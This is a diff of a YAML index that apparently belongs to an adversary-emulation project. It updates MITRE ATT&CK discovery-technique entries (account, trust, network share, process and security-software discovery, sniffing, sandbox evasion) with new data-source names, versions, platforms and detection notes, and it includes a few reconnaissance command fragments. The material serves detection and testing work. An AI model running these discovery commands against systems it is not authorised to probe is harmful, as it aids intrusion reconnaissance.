'Cluster: Cluster Metadata' + - 'Container: Container Enumeration' + - 'Container: Container Metadata' + - 'Pod: Pod Enumeration' + - 'Pod: Pod Metadata' + - 'Application Log: Application Log Content' atomic_tests: [] T1087.002: technique: @@ -46236,9 +48923,8 @@ discovery: modified: '2020-03-26T13:42:34.402Z' created: '2020-02-21T21:08:26.480Z' x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: | @@ -46473,9 +49159,8 @@ discovery: modified: '2020-03-12T19:07:53.043Z' created: '2020-02-21T21:15:06.561Z' x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -46707,10 +49392,10 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships) x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Script: Script Execution' x_mitre_contributors: - Dave Westgard - Elia Florio, Microsoft @@ -46863,10 +49548,13 @@ discovery: url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019. - - source_name: Black Hills Attacking Exchange MailSniper, 2016 - url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/ - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. + - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019. + url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/ + source_name: Black Hills Attacking Exchange MailSniper, 2016 + - source_name: Google Workspace Global Access List + url: https://support.google.com/a/answer/166870?hl=en + description: Google. (n.d.). Retrieved March 16, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -46875,28 +49563,30 @@ discovery: Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists) In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016) + + In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-26T15:27:58.933Z' + modified: '2021-03-31T13:10:46.302Z' created: '2020-02-21T21:08:33.237Z' x_mitre_data_sources: - - Office 365 account logs - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - Office 365 + - Google Workspace atomic_tests: [] T1083: technique: @@ -46932,9 +49622,9 @@ discovery: x_mitre_is_subtechnique: false x_mitre_version: '1.3' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. @@ -47037,12 +49727,53 @@ discovery: find . -type f -name ".*" cleanup_command: 'rm #{output_file}' name: sh + T1016.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1016.001 + url: https://attack.mitre.org/techniques/T1016/001 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Internet Connection Discovery + description: |- + Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites. + + Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers. + id: attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-25T17:03:26.632Z' + created: '2021-03-17T15:28:10.689Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained. + + Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + - Linux + - macOS + atomic_tests: [] T1087.001: technique: external_references: - source_name: mitre-attack external_id: T1087.001 url: https://attack.mitre.org/techniques/T1087/001 + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -47056,19 +49787,23 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-20T19:39:59.544Z' + modified: '2021-04-13T21:39:08.728Z' created: '2020-02-21T21:07:55.393Z' + x_mitre_contributors: + - Daniel Stepanic, Elastic x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Access' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_version: '1.0' + + Monitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux @@ -47302,9 +50037,8 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -47351,12 +50085,6 @@ discovery: name: powershell T1046: technique: - created: '2017-05-31T21:30:43.915Z' - modified: '2020-03-11T19:55:53.828Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Service Scanning @@ -47377,13 +50105,18 @@ discovery: url: https://capec.mitre.org/data/definitions/300.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-09T14:56:26.562Z' + created: '2017-05-31T21:30:43.915Z' x_mitre_platforms: - - Linux - Windows + - IaaS + - Linux - macOS - - AWS - - GCP - - Azure + - Containers x_mitre_permissions_required: - Administrator - SYSTEM @@ -47393,12 +50126,10 @@ discovery: Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans. x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - Process command-line parameters - - Process use of network - x_mitre_version: '2.1' + - 'Command: Command Execution' + - 'Cloud Service: Cloud Service Enumeration' + - 'Network Traffic: Network Traffic Flow' + x_mitre_version: '2.2' x_mitre_contributors: - Praetorian x_mitre_is_subtechnique: false @@ -47533,8 +50264,8 @@ discovery: over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the - net view \\\\remotesystem command. It can also be used to query - shared drives on the local system using net share." + net view \\\\\\\\remotesystem command. It can also be used to + query shared drives on the local system using net share." external_references: - source_name: mitre-attack external_id: T1135 @@ -47556,7 +50287,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-07T18:10:06.463Z' + modified: '2020-12-29T19:07:11.154Z' created: '2017-12-14T16:46:06.044Z' x_mitre_is_subtechnique: false x_mitre_contributors: @@ -47572,10 +50303,9 @@ discovery: Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Network protocol analysis - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_version: '3.0' identifier: T1135 atomic_tests: @@ -47686,14 +50416,6 @@ discovery: name: powershell T1040: technique: - created: '2017-05-31T21:30:41.399Z' - modified: '2020-03-25T21:03:49.610Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -47712,21 +50434,27 @@ discovery: name: Network Sniffing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 - x_mitre_version: '1.1' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-02T17:51:59.236Z' + created: '2017-05-31T21:30:41.399Z' + x_mitre_version: '1.2' x_mitre_data_sources: - - Network device logs - - Host network interface - - Netflow/Enclave netflow - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would - likely need to perform a man-in-the-middle attack against other devices on - a wired network in order to capture traffic that was not to or from the current - compromised system. This change in the flow of information is detectable at - the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. - Detecting compromised network devices is a bit more challenging. Auditing - administrator logins, configuration changes, and device images is required - to detect malicious changes. + likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) + attack against other devices on a wired network in order to capture traffic + that was not to or from the current compromised system. This change in the + flow of information is detectable at the enclave network level. Monitor for + ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network + devices is a bit more challenging. Auditing administrator logins, configuration + changes, and device images is required to detect malicious changes. x_mitre_permissions_required: - Administrator - SYSTEM @@ -47734,6 +50462,7 @@ discovery: - Linux - macOS - Windows + - Network x_mitre_system_requirements: - Network interface access and packet capture driver x_mitre_is_subtechnique: false @@ -47914,8 +50643,8 @@ discovery: will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Sudhanshu Chauhan, @Sudhanshu_C x_mitre_version: '1.2' @@ -48066,10 +50795,9 @@ discovery: - Windows - macOS x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_is_subtechnique: false identifier: T1120 atomic_tests: @@ -48107,21 +50835,20 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-08T17:36:01.675Z' + modified: '2021-03-30T12:29:56.512Z' created: '2017-05-31T21:30:55.471Z' x_mitre_is_subtechnique: false x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - AWS - - GCP - - Azure - - SaaS + - Google Workspace x_mitre_permissions_required: - User x_mitre_detection: |- @@ -48129,26 +50856,22 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.2' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Group: Group Enumeration' + - 'Group: Group Metadata' + - 'Application Log: Application Log Content' + x_mitre_version: '2.3' atomic_tests: [] T1057: technique: - created: '2017-05-31T21:30:48.728Z' - modified: '2020-03-26T18:05:53.130Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Discovery + description: |- + Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1057 @@ -48156,33 +50879,34 @@ discovery: - external_id: CAPEC-573 source_name: capec url: https://capec.mitre.org/data/definitions/573.html - description: |- - Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. - name: Process Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 - x_mitre_version: '1.2' - x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. - - Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_platforms: - - Linux - - macOS - - Windows + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2020-03-26T18:05:53.130Z' + created: '2017-05-31T21:30:48.728Z' + x_mitre_is_subtechnique: false + x_mitre_system_requirements: + - Administrator, SYSTEM may provide better process ownership details x_mitre_permissions_required: - User - Administrator - SYSTEM - x_mitre_system_requirements: - - Administrator, SYSTEM may provide better process ownership details - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + + Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '1.2' identifier: T1057 atomic_tests: - name: Process Discovery - ps @@ -48254,9 +50978,10 @@ discovery: - Administrator - SYSTEM x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. @@ -48301,12 +51026,6 @@ discovery: elevation_required: true T1018: technique: - created: '2017-05-31T21:30:28.187Z' - modified: '2020-09-17T12:26:53.669Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -48316,6 +51035,10 @@ discovery: - external_id: CAPEC-292 source_name: capec url: https://capec.mitre.org/data/definitions/292.html + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' description: "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within @@ -48330,16 +51053,24 @@ discovery: name: Remote System Discovery created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735 - x_mitre_version: '3.0' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-13T21:40:23.368Z' + created: '2017-05-31T21:30:28.187Z' + x_mitre_version: '3.1' x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'File: File Access' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_platforms: - Linux - macOS @@ -48349,6 +51080,7 @@ discovery: - Administrator - SYSTEM x_mitre_contributors: + - Daniel Stepanic, Elastic - RedHuntLabs, @redhuntlabs x_mitre_is_subtechnique: false identifier: T1018 @@ -48605,6 +51337,17 @@ discovery: name: command_prompt T1518.001: technique: + id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 + description: |- + Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. + + Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) + name: Security Software Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1518.001 @@ -48616,50 +51359,37 @@ discovery: url: https://expel.io/blog/finding-evil-in-aws/ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Software Discovery - description: |- - Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. - - Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) - id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T19:36:16.978Z' + modified: '2021-03-29T16:05:00.198Z' created: '2020-02-21T21:16:18.066Z' - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment. - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Firewall: Firewall Metadata' + - 'Firewall: Firewall Enumeration' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' identifier: T1518.001 atomic_tests: - name: Security Software Discovery @@ -48768,10 +51498,10 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T19:36:17.133Z' + modified: '2021-03-29T16:05:00.456Z' created: '2019-09-16T17:52:44.147Z' x_mitre_is_subtechnique: false - x_mitre_version: '1.2' + x_mitre_version: '1.3' x_mitre_permissions_required: - User - Administrator @@ -48780,22 +51510,20 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Firewall: Firewall Metadata' + - 'Firewall: Firewall Enumeration' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace identifier: T1518 atomic_tests: - name: Find and Display Internet Explorer Browser Version @@ -48850,7 +51578,7 @@ discovery: before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks - may will vary based on the target and/or adversary, but may involve behaviors + will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) @@ -48859,8 +51587,8 @@ discovery: the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties - such as uptime and samples of network traffic. Adversaries may also check - the network adapters addresses, CPU core count, and available memory/drive + such as host/domain name and samples of network traffic. Adversaries may also + check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific @@ -48893,7 +51621,7 @@ discovery: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-01T16:32:02.514Z' + modified: '2021-04-21T15:16:10.604Z' created: '2020-03-06T20:57:37.959Z' x_mitre_platforms: - Linux @@ -48902,8 +51630,9 @@ discovery: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed @@ -48915,7 +51644,7 @@ discovery: or perform other forms of Discovery, especially in a short period of time, may aid in detection. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Static File Analysis - Signature-based detection @@ -48977,21 +51706,8 @@ discovery: ' T1082: technique: - created: '2017-05-31T21:31:04.307Z' - modified: '2020-03-26T18:17:42.298Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: System Information Discovery - description: |- - An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on 